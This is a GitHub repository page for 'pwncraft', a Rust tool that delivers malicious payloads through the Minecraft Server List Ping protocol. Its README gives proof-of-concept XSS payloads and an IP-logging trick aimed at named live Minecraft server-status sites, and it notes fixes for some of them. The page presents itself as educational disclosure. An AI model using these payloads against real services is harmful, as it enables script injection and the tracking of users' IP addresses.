Skip to content
/ pwncraft Public

A Rust program to deliver leet payloads through Minecraft SLP protocol

4 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Traumatism/pwncraft

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
src
src
 
 
.gitignore
.gitignore
 
 
Cargo.lock
Cargo.lock
 
 
Cargo.toml
Cargo.toml
 
 
README.md
README.md
 
 

Repository files navigation

PwnCraft 🏴‍☠️

A tool built to deliver malicious payloads through Minecraft SLP protocol. Made for educational purpose, for preventing people from getting attacked by this.

Example usages

Use https://crafty.gg as an IP logger

Fix: Accept only favicon that starts with png,base64...

  • https://crafty.gg/tools/ping?ip=YOUR_IP&port=YOUR_PORT&platform=java

  • ./pwncraft localhost 1337 -f 'https://CANARY/'

XSS on https://api.serveurs-minecraft.com/

  • https://api.serveurs-minecraft.com/api.php?Favicon_Ping&ip=YOUR_IP&port=YOUR_PORT

  • ./pwncraft localhost 1337 -f '\"><script>alert(\"XSS\");</script><!--'

XSS on https://minecraft-api.com

Fix: HTML escape data from server

  • https://minecraft-api.com/api/ping/YOUR_IP/YOUR_PORT

  • ./pwncraft localhost 1337 -d '<script>alert(0);</script>'

About

A Rust program to deliver leet payloads through Minecraft SLP protocol

Topics

minecraft server slp server-list-ping

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

1 fork
Report repository

Contributors 2

  •  
  •  

Languages